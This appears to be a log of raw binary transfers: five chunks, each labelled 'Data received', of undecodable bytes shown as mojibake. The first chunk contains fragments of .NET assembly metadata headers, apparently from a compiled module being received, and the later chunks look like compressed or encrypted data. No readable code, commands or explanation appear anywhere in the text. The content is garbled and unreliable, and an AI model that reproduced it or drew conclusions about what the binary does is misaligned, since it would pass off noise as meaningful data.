Data received :Ñíÿÿ& 8Æíÿÿ~€ d€° ]Ü4Y ±{ˆÁY ¾½Ÿ¼a}? (I9–íÿÿ& 88‹íÿÿ~€ ²›VA b b d7­a}ƒ 68`íÿÿ~€ a>¸We ŸÁG¨a}Š Cþ88íÿÿ~€ è_¼L “vÊDa {)va}k b8íÿÿ~€ –µÐ> ¬Q¡‹Y |ÈאY &#d\a}d A8ììÿÿ~€ ¨Ù"?f ÑÄæY †˜Úa}\ Z8Æìÿÿ~€ ‘Ë€ bf ïFÿa}7 8 ìÿÿ~€ •ÁC@ b Ü0l7a}q (I:vìÿÿ& 8kìÿÿ&~’þ*~’*BSJB v4.0.30319lè#~TÌ#Strings -°#USÐ/#GUIDà/h#BlobW¢ ?’JN$  BIdI0IW\sIyÍýI6DI_rIŒ\ÂÌü &ÌNIgIn̷̦ ¾ÌòINWoIÌIëIòI ù+9/W<W}³¿ IN I| IÓ Ië Iò  &DX³kzW‘W®WÍWæWÿWW5CbW˜²CƐáøX-HawaŒX+Y n„ £  ¸ Óáóá#3="¡Qd)¡|„4€¤7µ 8ÉÛ&<!ì(Cð)F<K"N/RIK"ëQó/÷^K"ë“K¤K/R²é!%3÷:'¯‹ð¡óën,ž1Ô6K"ë ! ó K# ÷/÷3û* m Aƒ 6: ‚T Kw Kš K½ Kà K K& KI Kl K K² KÕ Kø KK>KaK„K§KÊKíKK3KVKyKœK¿KâKK(KKKnK‘K´K×KúKK@KcK†K©KÌKïKK5KXK{KžKÁKäKK*KMKpK“K¶KÙKüKKBKeKˆK«KÎKñKK7KZK}K KÃKæK K,KOKrK•K¸KÛKþK!KDKgKŠK­KÐKóKK9‹\KK¢KÅKèK K.KQKtK—KºKÝKK#KFKiKŒK¯‹P “ T ‘5 \ –G !‘Æ ¨!“îB´!“Fd'áV9(+áÁ§„+“ÞB+“ó±¼!‘þµø!–4µ˜+áV9@0áÁ§œ0“rB¨0“~±°0áV9Ä;áÁ§ <“B,<“±4"–8‹#“B #“¢¥(#–ÀªÔ#“`Bà#“uë4<†9<<ƒ°÷P<“ÑB\<“Þè#–ü ø$“CB %“V' %ƒ9 %“å: ´%“* T ¼%“6 Z Ä%“M a à%“f B ì%“~ q Æ £ ‡ Æ º ‡ ÆÒ ‹ ÆÒ ’ Æ ˜Æ; ¡Æ[ §Æq ±Æ‚ †Æ” ·Æ§ ¼Æ¾ ÀÆÏ ÇÆÏ Òô%“ë Ýd<áV9ðBáÁ§LC
Data received ¶—:Àƒ¿}ƒU$‰8I*ÁªùR˜Ë†¢Ù'>’ª3ZÀ’Ð]©ÃòªÆrÝqõ/‡4(¦’Û¿^î=í?(ÌW‚hÍUÀÄÓH5:zÅ@’»µ©}T2–Y–o•–ëÁQ°ö%¸‡š«ñ?EIp+G<úÿr% `Ûr½S’{vɘ« NêÿÚ!0ýbÎ<XmÆíªÐÍÊ4‚¥ªAØ_G¾‘]Íô‹uñ‹ £_ÝIlRæ;9XÙq†Ç{¼Unô"8Ú ç€¦a%èÅãß;®äŸõ¡Ä\uõ*ë¹Þ/ñPî&¯+éq¹‹3ï>zü`Ì_q«°ÈFècÏ@Az­ Š 0Zî\!}ñ·(Ê(M~ÁR×$‘ˆ9ºüE­¬V‘ \-?] HNNról mï^"Ýð8 íí<R#¾ þ•v¨.ëø‰@t:U.S>¨„-6¡Qñ{RÜ6v™àyd[•ÞÖÆjÓEÔ¯˜ºIW¢¹kjvÇ£Y»Ó/=z#®CF¹[ö¾W¢$;×¥uo×þ‡SãÎA\4”("S£Û=KdÀŒ!aJêÁ|Œ¢/ùßÚ®¤ž:蕐göŽ ʙ¨Ì&åÔ1 OÍmAóõuÔÝõ…²µ…‘šúƒzWHÝJü‡[:%X%l ³yåÈÇd/ÑûKUŒ PŠ/¾I½º w~÷@‹‡´z1 R]"ðõën•µ•ÇËâЫjû$›l&…k|ãšT÷??¿êâ÷«à•º–¸nûÕ?á¾¢16)×sS<2âô—ÏŸFœÝšæ©°,Cõ®æ!Q%•iÓÖrÆ{¢aði X‡ÙÏaQm½qþ/ƒÎ SIýkžp¸.î^Û8öyÖÜ^ñ zêrG´¯ˆb,€Óþ¹3VÅô n–™Ê,)Œ mtM Ø6 }·M 8›™:¬ÖS)rnÑó DùÒBHbkm⠏ÅxF:ûb–½+·H’ipô¼¥Ç`‘"Â:£«¨› þºÛM¤10ó›×‡­å? >` íȽjDÄ·[»©)úÖFnš&z˞·Ò@XÞ³ÛXÿŠßíÁ‡vì5ºYOˆ¨‡5é¸ùR2‚ä—ɤäžRïZØÚˆýÍ*7»bÐ=v>7iTË ?ÁutÊ{`ÆÖÂTß07¬R¯ÖdL™€tÀ,FN±ýkÄ=íi,#@ð×IbŒÚ{[WšmXŸjT*7Àãå$ËÀ÷.‹(Z]©`}UDzùøT/mJÑ÷î£V¦à}TR±¦Ô(°Á6{.póO-ñú6p°†›Í.÷Ðç:éO…Wއ+L­[°Í¾RÈR* \í ÄgBŽWŠÿÎæ(.™¡Z?Bͬƺфê”÷0†,xdî*ÆçœݏWûþm=¤¬±ß[š‚'¦<ý%n0 Œè¢ÂÃqt ى¬ÆPŒ¬õZdºÚð–ÿäÔ¤•ÇìÏ囡,³ó˒õ,<dE± ñàOalûuÏÓ"ՂK£×syÙ«1 ®¾³«RÒO*1äv[šÿ[G`Ñ¥ kîx»¬^°›ÞݽŠ%Iæù¼Hµä 6ÝÚøIlkّ²:¢û´ë¾iz•°ªK^'w§4‰ŒÊþ˜=;lëáv³ Ö¸{]ðîD?­˜Ž¦‰šVM‘-ÛE£™± 8³ƒSetg¡$ޏšzÆ‚›ã7‘Œh…/ׄ&_-æ=ûpÄ ¢È#©õ%»û¸?¯Y™¾Ú&*Æ-ÊOßßLú5±hñÏ5;ÛðÓÏ[¦ù çʏïŒË#?õžîEŠÀÎü¥ó »0É3,ЋÞâ5Ž¿52ˆµTkA¬e¥‰Ò'DVÎèòí_F¸53¸Ž>R‹$^ÿÜÒ(ÿœ3¯WŽzåF{X'ŒÒ¿Ÿ „£õÍìé u22¢"$IÛ6TMl¨ÿdý‡ûˆB#2–Ýä¶M-å„r©KDl•ŽŸBZ•UÝ[-uŸï"ƒD`\ú}TÏí&<c>\P¦!Rg_¢7÷ñ„ª[ MxFÞ­4OAšU»žÅתíA1qÔ«š*{ŸÏT‚toò¾AÊÉ·Ç^Á¬€ð¤ÏÕÛu*ڏ0´d“©ôÏÉ\¹Æû\¼i[Œ’T°½zö<4“¿HjC®ûýVUóþµÎoÎMoì&ƒR¾ ø¡w…IuT¶Ø¿RpVp`­8 ¥á@;ʧû©`0UˆYà ².´BÓ Ùv½ Ïêø[EÎôie­LÛvO±±ÿ‚×Çe#[7ÎÏÅՈ2·ß Ö¥å¾*!&,-2"ãphåÚõv9Š(V Œ+-d¯ðéØ/Ò¥WPªÂVT.¥~Ù{њëÉ¥“ì¾at¾°E_™¾Û&TpdØÄ-p£#“sqÐì‹;¿î«Í%Q„à›<Þï"ÌV1Þh¤*p&8×Å9q)ó˅FúÛ´½)ÓP>¢ÀœÚqÿÏbdh¡xG+Î?ÿ•44Û2ÀÚø˜L¿‘q¦},ßmŒ_©QMö wKv¥&_‰¼Ôª2à‘ ŽË"2{Ù þ=•óÙ½  Ô}ÈBèÿl‹_ñ—®Au•øQ7Q4Aµ8Ý?Âráƒ>“B¯JñïjÈmܳ퀗ŒÒÏÉ´¥&Ú¨äÇAÔíñªV2ÿˆÏŠsWg/B~×΋:\?pö£VÿW"\i6ÑVÊ8£Û0|Ý¥ù×µÎ~CS(BkEå¼LÅC&TÂ-º³ÐDœÀ9õ«·Ó.Î+_ý"}•N‡¨ÆÐR_›eêO)ÕÆ.kó& ­ò¼Õàu²!9ªãnJ~òÛ (/.Õw°BӊÑփ¢Ì–´Q@8.ٕnëåqÉQïe÷’é71@59b c%Hye^ùsÂBË] ¶ÓÛ^/˜µ,;ÎG@gx@O k  Ə qíô»<bÄêq2^J—¾ÚƘä†Ñ†ë'$Ë3Ôn8–1äsÚ)÷Ïw5Ë·`„ár7‹þ}DØïé7"³7áäÿ É©”~‹CÁ5<ރ©Þoô«v’`Üq©ì1ÀÁ0BS"ŸŽ$ú}jAU)‡¤@ÙñÖ´6uŸÙZ_R¦ÍÉ계¿•Sª{åôöqñåäMTxbúÇÍ4DãÌt_=9¥»ýâENÂw/ £ÃÌ5¿å™>^@2~÷sqoåý~ùR8ýÕos7˜§  ÝŸhñiÇå%î‰w¼µU|í1uÍj¶£Ž&ºTûȼ…b!âGBÖ j܀úÌ©›ú"a')t{üì•'1±-Íç† $¾Ï(Dþ†•'¥òKb¸bè6izþ&–Œ†l ÌéUT¹"^W;æ_²»Î©mݬ“í»ä óϱ·6÷2‹ŸÎ‘Z#דovZŒ'9ÞÆYCÔRùº'‰ºÌ§O•ýêi»>’Õ(ü o_×J¼…éñÑFJÄc`ßð_5‡¼D”+@×ÏC Û'GÛ*ieÁ¶ÆÉS½*¡ž›DY’‰h?åX¹”ìƒCDEz¨œòjQ‘w!6ñnònvªñtƧ  *âΟáB©¬¶™Ä·c—ìÎíxEÞcWWT½c‹Ý}ƒ{”`Ÿl4º"çÑvr±OÄãïo#Ö]’xö‹¢q *'òøÄ7ây!u™Í>;À+Â?6*¹ºˆXÚ/ìJÞ„ý¬“­C$rWÒ¿Wæ3'O󷄓¼Kà¯p2[ˆØÙHwώ£eshòëp
Data received €–v}>AF1|švi¾×œÀ<J¨½z%HÌ| 8ÐÓbPû|S'²T»Én—çbKߋò:ò™ý(ˆ$êö“S8j¨^i¯Ý‡Tšâ}owäÛDÐ!”l”ÐKþm1޶s˖vóüØÄüÚ×¼ zš_3ÐÝ9žØ +€ãŠöÝÙO'W慍çÌþæïÈì¨Kê|¸ï ÄúšYÉ äŸQÌ Š7M!H(»‰YO*%¸¸€௛ Ž1 ²$Ü¢yDkrQø©(^=ƒJÀ*㙱N´I3lŽ µŠS|6•6֞m\9…ƛ°66.Cì„SxèðW±w àÌ t» ß«sZ/KÜÁœùdåÔSìì 3e…›ñIÇlwãZ¿Ó,.프~²UX:Z¿œ÷0t¦r,£l{عóhBû j#×T:)ä%üiDF9¹ê€DåPµ‘>T«šl¹¬=ÝÔÂèÏ1ñ·ÞëFx•œÆ°ð8'_`¢ÎuDžý™G`C-ÝátZ*±Ú¢ ·ñã3KŐ ÚŒÿ &>…™¸Ýãšúæ°ê×M†à>rs¶ãZ7lËg°Ž²}p4––åªU·gTülÙ à֢ލâ[jÔª—FÉ5&e„š!:ø<üV'Lä"ƒ”āv[J¹+´¡UZ3ïy&„¸µß~ÃÜéù¸³‰31&”ž~Æ€ùe ¶TL@pdñÙ_@ ÁR[{ºBɚ`t ֛J*V³ñY›-ŒÖ§IVKGº ÏëŠ'#N:žeÇR÷{ªµØúÆZˆ.•÷ ŽÃ¹AZ¿Tæ§*Jö¹U¹£#$¤7í'†áGn±¨è±‹k‰ðŽH[%â[²êh‘«”©¼ Êw44}|ø~¶/ùym¹î´!¼4Q¢ß0«&½k²«X~ó1 %‡ª`àË.ό»±^šÚkõÿ¯“/We·ÔÖ>«‡f»ÈÃ*šIÄ-¾²ÕχšÃ[øé¾Lû·ú Ü7"†ºƒ®ñòŠZ%­² ?žGlڈÜlóKÍy–^ €±öÒÖfyX¥™_`,i/ŽÔëwk…ó€j‚¸ûjSüC˜ñ%*Ùëd–³ÿ¡¯]مݺÝEZm€ú$¬6Å5|CÕgZ,ÁŸðÒØn½V¦vÕ4uÐVþOwýP9ä˱ƒ÷æÁË"¿N©* Ÿ›Ù•Åy¦vUÝCÇ0pØÕ}N"Ÿt«{47œâu%¥š³kWíÂçßõ• ¤ì˜‚‘àý^\Ert2'œ#4g›r(E¾¾³kqG!78¾ŒÖ"wh5ñãÊ6 |wÖ7Š&Z§¸úÐ.æh¼˜U0?ïÎ}£{ð+ñg?ÚbZ›ûEÆhH:èh”è½ ·°f€BÎÿh#¯äR5@Ñ";û à!òèë™Bèªa_n»hDXü» ßłöž¨V\Ä¡øOì~ª8a¶Á#¤Å# ”=ÖK ˜Ô§l[e}öûiÚ¬6›··ÍÜkŸÛó4@…~oð/úk¯£&‘¯¤•½B:¨FA¹eUrmh ñ0)–*þÉ4CxÃ仝íJíÖ4B:9 yìĐEÿëÿ”Uùc¼’.¨w…ò)#ðPöaŸJµÿíßt0iÃ…_½³V¨6d1yŒ•ë·ÎùF=ǖz‚–@ú{ñ†&‹%ÿI…Ì“­¥”ÙI\ ´§Y-f¡Bf>¾j\¸DE‰l %êêªÐ‚ÌŸx]«$‡r‘7¤KúEŽúKãö÷€¦ó(pïäÙiœ{ÏE!Äýí‡ÆúNÀµÌí€?ÎOÙX(W׃+Þ'T‚+<›€;P!¡1³£öÉaLndI„ô\ÚݶԶåt/ìS¯e‚é)üñÁHƒŒRâoì´0¹j­ŒôÒüà’¬É(‹B½ëQB¾JŽËX3dgÚô^鸟ù¼.?F&¸´«“д؟CÅtPc~`qÏ5´Ÿ°ÎùxœòŽ~Î¥Á«ëÉö|‡Y~ðõGYÑg6•ü…ì!tøëzÚÞY®‰ŒÈö£7•;<hõ0ÁKY˜ç›à‘u¥.¬½Åj´ƒ]<aõ&4{õ@ yW?OäÁ­·ô.r›%Œºº¯¯€º‹#s”á„r™÷“Ó‡b,rI‘Á@\ö¨¦1—§Íz1_ÃjWec ‡—Ð("²'§ O¬Œ0á€éx³õª)ˆÛÃÆŽ‡-¥%zßkURèÃväȧílb…¾»¾ByñWE—)ëOûV15̘?Ž}’&ñٓvj¸)«•·•ÜٟÎ}[›u(ö¥N>ÅÒËa’æ\É (ËÌ®e<ºã¯Õ,¿áåß cÒWù¬}ë‡Dî›EÈ}›0’í0)‘° Ï ¿Zë† ^‘34¶pßU¨P°ñ,’q„ãæÐߤÃÙ_©kº•ªl)3¢wŸ°&ým}DK¨°*~Wœa'íΩþa#õn*^ØêuýYwµÌF™‘ó.ꁗ™mbò™Ìô‡Ézà{Ú;pZ+Z—É~›ã4u›…«n‘—b vnNhõå4À»ôF몧r… ñ3ù½·§™åéHD69Q°$Œõv¼i]c9ŠXSÆ]Q "€mÂŒ$¢‚ÖŒTþ.ÄæUT 9 ¨)噞¦âÞþ†Q\ è3E­³ŒBg<<UûârZfQ>)o„aϦñQTçBg’IØ ×ÞõIáa°þ+ײ"!ø,HíÖ׉|Vj ÕRH«Øe0â*Öýg§ÁÓÙ_a^4”r‹zê¿­qï» „ €ÑtÉáfµD¨\Xry»v­ãàsãȊqëÇíL2ëÇúÌF­êRϦÏÍ ÊN¶ò·h¢MÑr®‰ß‘«)Ý}á$Ä.ZƸkbìîø÷B)¢žž¿ž&Ödã8´yu³I=‹‰Àf!"#mVKödKh̓Öá"QLó‰–Jº'§ }–¢X7c1ÒxÉaÅ8ñi>V eg`yÍi÷+§ó$(N#™×QC«Î¶cï¤g þîñòv5s`]«ñx á:¸¢Û@B³¶À+4sèLºØôïeWÔØÈ6ï« }Åe¢E‡jç…åz‘Ü›Ýõ+†X:À±XX™v-ˆ®ÄïzVÏk·z‹p´ÞTÉI|ð¤Ôæµç®¯Ú˜ªx?¹ÕeåW•¥¤ð|Gx!Ñ^tòºç&]šé”Äڍض?Í+õnp~0zvb½Í-€T\ŽÌžŠÈhƃ:'Úö|açbùl¸Ý…÷±+ŸŸVM ÎÞN $ ‚BÍöÔx» ëV´ßú#Ifp‡s`±­ó^QvõÓ ?‡r·xÌN;­ RT%D6i´t"ë¸Hµ?¨i¢!¾?ªvÃô~[/q ´@H®n»¬¸fä†Í@Ho³\%×q$-]€µïd+ÙH‘€å'„7&ݜS~û”œk¡×ȝO:†1/ç2ý>FŸì¤§hÝ÷r·õö ðùó=9G ¤ªôËËô.l¯è!GmZe @¯ØC@x~Y¨q¬éx©· HÚ4{Q9à2Y×Q‰œ&l'©³Ûߦ W5 $Â>ñï@ß‘4½´îEà¥ÞXè{ÛÁwå#DUšÅ¯µÍŽnãÏ´n³Hí ìêšVæv„Ù ši\ÎçôÜð
Data received v+æfԚ\G’ œ]LOX;åže,Ï|¿Æ?Õ`“4ÖÆü¶—M<¥îä1ÉSXwÙ1À7t*ýáÐ G&¦ÿÆ&ÜiuO• mð`ö´c3³Zú~&ÛHˀÉΘ5ftÖuÀ` –ˆ‚|Ê #•žA‚Ëì%¾œ0õÃó"ÿÅY[Ýõ¨d«X r-9Â¥âSx Â!¬EÍ)‹9šVd¶Aº«€ø'A&œ&ØÐÙ‰bJêä¿hcç<¸¸%”kx‹‚æœø+=äøSf×.O©”;A÷áýèˆgF»æþұ㏉̷Gc8W½Ô­2,â}³k§ Ã7¯EØS¹é$Í²¿_ÎÝ#ò:cX¸<­õÈÖÙ{½)¤±Íâw¿‚©öëÉÒÈEV“úŠ5±íŸÌJn€Ïå˜Åg´¬XÎgþ/zõxìÿ(Îó„¶,-¸ Ë×äyu¼æH$1Ír‹(ҤTNÏә8T<irXÃÍÈiâac7~4jçgRÙÞ0JfBS?0¹œŠ9–©ý¡Þ{’t½®’ÜP7ªmïFʼnpnjD&¶¼5fÒ®=ŽÌuù°Ð`Á•VçüM · 0 ¾¨gd—Uûýñç™Å±ç«ô™³)ñ¸eq ky‚îܲ.¨ÚäU!X‡!¬Ëƚhoƒ,<Àr-bÀ;òÔÆ²£ªÌõÞc`É;À/ݼڋ:ô³²$¬.o¬—…ƒJåñ …‘¤gÒÖà 0œükäš"cE †ˆ4¨u7(||z`éԁŽ `×XÕ«ah<e)í(_›[<@^äB¤ñ‘Æ·O¤¯tÉ|b×ßó5È\¬A°sè£8k´Ax Æ¡bwHÎg@MïIÔ¿Zß} 0…Ú8X?ëy<¥"õÅêë)ýM̀˜mnüÌ冱ùÙávà”2»êºJ‘·2‚PeÅñ4`·²Á¦x$–b²<4Hé;‰eϘáÛƒžò¹òü°ËŸ=«QZ§@²)$ ïûžcáWžu%J¶”êTôEáx,Üô#¾¸‚kɃ»9 ï3͛Xá«’Ãæ6åÐß¼ÆÛ<hI¢¢‘sHü¼3=€Nñ‡E‘ÏÜcíå7ëÆå5Ù­|û*hçâ>f¨©…iâ%Ø->ÅŶÞJ¬üGF×K|æ`TdÌK`¢à@•£ËêèÈ`wë,h¾Ü²Ìh¤ašt§u1uƒ¦2“íËV):§"»–ÿÖ3ìAªK%ö$…¯ä+ÄTόiðÐÚE}[ ñ2ãþ¹Gx{Ù~¤ÙuåyÒTÑš?)É©ö¡5H¹2azB,*è¬a·:yµ“Ž¢c(w×7;vƒô01&çóÒZÇê¨áKöæ "òî=s”T+ì¿ùñ”ŒKŸXýq1ÇæáDc ’Ò`ÍEõ{ZnÃÝÅä8ÛEÅøo÷´ã¨ªM᫘ ë_Ǒ(هí£>ìb°µUC†œ)Œu+K™>oë 70ãZhy#¼ï¼pk_¢œÎà>DCKrÞÞú2þ—w`[† )ñ±ÊNö’¼\W™[4Gñ5öT%ÁSþøóª[‡ÄóGmºVr[ҋÌ_H\cC+gA:}¯ËSóÙk͜|"'šABâì 9˜Û M­f-¿‰ñá†Z*£mØï—MáRŒޏè›ýbÆóy®ü9.ŠÐöò¸ ` ¹éíõ‡‰àÔu{Gï2ã|à}—nØöj{~ÔÈÂ}âgÏýÁÕ¥a‹”$QŒŽÿ:4Ù7?[P¨‰[*ÿ@7Ô«² q;µåî'ÍcÕð=cÛ/3ÎcdS2]‚y7OJ̧dÙF<i£CJÉäa91±‰ÜP\>&Q¤ø Z€"¯eƒÛˆüÖ%Þ}±äÙ¢8Coöù3Š Ý^¢€‰ghÙHÆÀPÕ\ì¡Íþµ1Íñ~YÏbD}ø M)]¦÷ö7$ ï)Š œ¾É!.°€bp@¬H Á¹Æ#D½˜˜gq´ôwÈU”X¥ñûs,—>És%Õ7D{¨ìÆ -¯†i;nK5 “îK¡;WâÇñží~h{טð^ÌþHC;F‡¤Iý¸B•=h19­ßƛL5vã@z!mÐ~šj‘)—9V­f];u°»T†y$ U¹„E%*ê¦ôݧÅr‰`Å#:맙hÆïI#vɂw<ÄÅ´Í VØ{ññ©_¯»[¤”ƒÙ6½k^íRTùÛC%/ø û°oÔ"fænµT€~=ùð±jØvp¶ÒÑ[ZÙJ½¬»ÝÖãIŒ<oè@¶‘ð_þõØñM¨f.¿oÊ̒ƒ`2VOþ ³œa ÛþՅßE9••)®òh5 »J¸÷²R$‘~kV §Õl¤FMçæ+O{½·bòÐu1Éñ 38½îcvÖ%î҇8+§놕 eÉQÏŠääԊ6,\ðUäw½¤‡ùç \TO}®Ý ]#:%áÇs¿ £ÈeòÌ£',x8ºC½}„¿ðwÜý1áe ´.²ƒoí †¶!E\Y‹ñ.½#ú._ë²ò}Dx»]Vü%çZ!÷sÜ6¿y£ª‚ ڞޗm¿Fˆ:Ù«[4š‹†å~˜$|F{ÎýME„f&b¥™¬à) ÌÝû{wdp‰X–ÛùgÞáAèý6Wj&¿›õÓ·¥r.%໊P†9÷Ü.¦Ééœí X^ŠñÓò‰ùFxq¬+¹Ä›Gs¨}7ÑÒ±Ì5BOjv«Ú%„Àéàa:v¤÷¨]V>:áEʸÖ&ëÖ°˜q‡džòÇ£¿þ¤‰|þ÷'S2×i¨‰PÝ_ˆc§dóÜJn…td¾wyž(}¦! ž4\jqB¼D=i¢¯JÎAá¢ÎØvm=¾æaéN‚Ð9$hõ¹´;P.“FN)“0Ø'â´|}³hŽ-ÆBƒR2öiiü÷)wq®UŸ›Î_Q½|œà†yp*ˆАi¿ãxtäÀþ¡›D!‚ÙDŸdAX[©M0Š—ö”GN€'ÞK õÒ¶ #~×ٌ·‡3"\ꥐK gÕ×^„qZ`¬ÙU·ÀŠî±ÌôÚÈe 3蜊øy¦ç—åHø{o:ñ8Qç=fs“ti ÏoÚ_]ôk&¶gFQ&jZ¨U‰ìa…V·y÷®'‰­Ðó½ŠÅÜ!‚Ǎq³/˜åhÚK‰*_giüK_HƒÞ!9Ö\X—œí­§ŸxÎs&å›ýóÀª 6AdíÞ¨pA®¥>‹ˆãrj£Ûö…; O‡r0Vå›i½u꘩±©4L½Ð@B™á©׺Ÿ43ñÔéÊæ í¨3ZC¹• ä~kKÓVƒÙžŽ¢ˆ1’¬¸Å ¤Ãòq¥Ÿ·ÎtŸŅѡDÞ¦E7¨mºÂíw1Ñ9ûa‰Í@3÷›rv¬Ûð†Î#A›óz¡½²d–rús¸l,Ìٓ/”%íæ¨ýÒÜñÏӽŗOhå¤`× Þì‚Ы£‚™DÒ~`8a+þM9­ÙP|ìQa7ÙÚêæÎ;=aÇÁ<µxkâÿ73çÎÞä-6EÓ`ÉPgr¢.è Ò ™3ûÀpÏLLï×y“‰“Y'Ÿ©' äü…Ò"ҋ,ykíWk‡èÔ,uÊãÃ4ô9Ÿb,<fhö·Pž™t³ÍzÀ¸Ueýf ák©Ï½X»Ÿ Hš¼L(”õ¿£p;éaEù
Data received š1n\úB•&‚‘<Èè©æÈ ÞS¾’ ªè 7»B†H{R*ÿ“Û¼mzubxè Óݞ3 ⸰̎šËxe Òûð8È"0{µéÊ4²a†N|i•›-г3G‡ƒ¹Ù½´ÕÌ7š7.ÚÌ©‰UwEƒ z›SQ™â‡é‘DOty³ÍcÅd„vÌ?îD²xष ËåTZT»ÅxVUHPw?5!¾ O¿¼Ö؇æÏB˖n}€P' Q":ßûh!\?óûH•å#P 4çòþçÔm n´sbíãæòg øFR`½[³Ä¤Ù¸~ìQjÒ³»³ºUéÜyîgVœÜÈnvßʅ¡h¢u$oæe 'ë³W¸©”^»‹r“Ú®÷#8œi-å ¯\½_ÒøÛ o:Ò}”­0@·–f˜’4Úc¶ï#4&ÙO؊áÖ*öäԑ²+ls|º2v¬NÌ )˜U»fã4Çiö`|§!¨¶/íO5xÀ:R§J|~£ÅK">#Ý¥N7š*ƒ35ÒWv,c•O24œÎ/áïDF|´’ÿõGìðÜ&ؘJÊïë0;ó¸y%׋SÙ à¢ËFÍJ¹§Îmgði?¸¡N¤´`SÊ r:«´è]9—Krš y¿ú!ŠN^})yd WMº¹~Fƒâ,ŒqÇ"pUëw ¤Œ½åÃÁ},Fh2u Þ<Y“q0ž°ùÊïX¨2ŸE¯Q,Ƕ&rsj™rËûqOÜè²òn®aיZÓ@dqBªb·Õl9H(¾1^°¸ŠÖLàÜnü_˜º’z°îñI­h©V“”•ۂ7M©àŸR/#w«S› €è“s‡åÎ$¾TOiáÃLz ΧÆårïߎ s0 ‡"ÀëØ»—3 ò^N ©è´{3ýU”PC‚L›JGÌm,FP–­®r5à3³M"®`‘šò‡Wß×~4 Qý;BՏ~@Èý…Û/‰É# En^uà‹9aÓ²d)Gר¼CÕ˗94¿ŒY#3æ²^»­Ç¡_iƒUWX:>ߦty‡ æÌ’@ã,fâ”R`Ô>ï“Åh alµƒò¿Ã ہvû$‘ ¸jT½¿™¿þèº-WöÒõMß “Šf¾û¢—:²Õ¬ì›/Í0»Ez7H ¢³O±žÊûàò2ô†1†Œ“:MŠÎÙT»êµWY{ Q‡Ú–­$ò8 x‰PÄú!,‰,›§O"¤Áíâï!–¯ªJަåûÎÂ?ó?/’žÃ§$‰h@YñÙt1X0 ge˕~•áˆd”S–Ã;mC´-@£Ý½%‰¥Ê=`Þ¼=$óÀK)~ß X{.I$b b†H“Xœù‰¿¢žåÙ<«ø^õyâNŸãÏ®¡fŠõD®aѺ;0¨ý[Ýx¾¥w’bæŽZ¥b£5ÒØó9óãï&´‹_£•ì%/©nŽQ5óV‹Cêsß*®®››–°ûÏw–Ÿù'ÚP֓,+ÒÔÖØD…\ÄAÝ\"rå'/ŠÂ¸X[Ü®˜Õ¹?™¤`Ž]$mIúö'èsûîHxy)‰T©Ý±¡­ÿä³´?×sÌ» -"Ó(²Ið¤ifX°*Aš{CΊá“sod©4ಿ¬.Ðêaa  ÓyUûG•Qæý‰ÌÚÆ˜8ߨ0€Ûyƒk|A¼oÐh—ŸùÀ%iÕðË%¡<j¹{ª5)ÝA¤…Cr¥·8ˆf?Ç;〈€nÎÙJe ½0j<Éïa¹Ø*¨›Çƌ3¼ëس›R¹ŸÉKe҆ŸN‰´ŒCƒ8H’ ¯ÕD¼ê'Œª«±5£&gÏ=ü£¨A!U/·hñ"„“`¾Dm:½oÞq¶ùy â¨vC°%‹Èš­È“BxוýÊÔÏK¶5웚=oà6@ý™À"f0”êú¸¤®½íTŠq¯r¥ kÌ«ØÇ•hzð43QE܏¯T¯™ÜÚoø…Íñ϶}–³Ú%ü¸1 +ªò„¾t0 Ð.ÆÛw0›ÐŸö©0j{Þ«®÷-׋^”ï|™HœCó_D=î[KDr0<dEPc­œb¤]üòxRZS¯Åf‘6Zº}¤Áƒ“åŠ.¸ü|þ͓Œ)Г°ÅúØ×¶k"+ö6k½´­ËÇ®vhAÂÃÖÅ?får™¼rØ!rïôbptRÆõÚ?ác+£âcBA6-"ºgôu‹—P`‘&“+GîqöØÑ‰(Q#‘fˆ‚qëÊsd9à=ht6f<|sό§Å> ÄqÄDªÇPFçðÞB!F Ÿo—üH´~ÆÁ#“×d«åÒ«aÀ“i‰Ã»z^IDºœî#¬Åæ÷>[®ûØ()ñcŠmË̏äP w^øáýyš–KîÕéaÛ{‘6ñÓ«þƒ°oòR)o¥ìfà³%ÔÊÍÛæË:‹§¨˜¸}*ñ3IYʈé!é…ËÜ0giiåB¹ñJUò_Æ?Ïz1±%!¡ãã׍Xaò^Ւ9^í±mà¯Üµ7ãâàHÓrµ™«‘'Õ`ü½$ ñ b}TPA* {êDÕcTíá™Ç×:Coã¬#TVÍY]7ñ˜Ó Ê-†P¿+~W—oŒÛSÎO­šM¬sÆ+Gw‘®£í&ä;ñÁÆÉÂÿ=6ˆÞ½+G—ù‰év àâÿ”u˜ý©[„¦ÚmbµïRèè­>¤˜u+ҐjüÔP3âµË2ovëqY¼Ë`‘rÖ£©„SµVoÞû.¡¢…Ð ÕéÌx€ Yœ.…5¿½O'ÍË[~RÆøÅ½ZÀÜy̪pFy—ŒH£Sò¦º½Ó/淑È+Pç9> µ*J-È=21^ñΔ`s»”®#‹ ‘fÐÀXž"‹_¥ÕylV Meo*®BçEl²2Do•¸â±§Aß§õµ°s'ÅR‡È͔4ÄÜòōãØCE%¦Ùú”P‘…,âƒIy)J4h„ïÀDAÆÂûˆ8•ØtÅ-×TžEvDD[;Ç U9˳måO z=_®ZشÆùÏK½áÌûø£— 5›z¨ gÁÞ1Rý±-䥒AJ-¼j‹£c¹CÈV_áaLsääÌ!:Èʺ‰É>nzùÜfa¸³©ÐÃ×ÓéîY!¦Bå1‚»R,‘Ýúˆ.f+î¶;¬Ý±SiA‘â¯GJ¡f¡È÷íÊoK#;È0´9µ '"á(–ÈRJúõ[ˆlLNu¾!C%" ÷4tº,ƒcêE”äp½"˜¦±0´Õ‹¯U¿u¹ô‘ý/ÆúÀäšˆqéÑ2¼Ãå5QÝ!£´êËÎÞÆ²;í$U‚0¥ßeSA.6BÁ(?âs«°µø8½»~ì´Qó<ËâGÊ! ÛL|àó"kX£TðNЫÅÄíC²¶‰‰ú£µ2z4.{å¥7ñ%ÀóH‘=E;íROM.d§Ò¾j¤"[‹èВùÞ¤Ùn Z†ÈUwhKéHýûFŽÅ¿UÂSeP±hO´Hÿ<Ø÷¾³­U²àÂ+••H ]$0ó.¥Õ-+žÿŦš 3J¦¼#Ä3ן~'<˜“ïéÅ-xSÕß-"&>!i4²„)ÄÑ[LõÂEg·ûY±u#&~ R¹L“S:ñŠeÇ+±f¶²_‡é]Å¥XÃU¶Ñ6†PæîF ¿|W¡æ¼CêÝJ?0Q¼O3SòM‡HݟÂ_±¨‘šZ ™0'
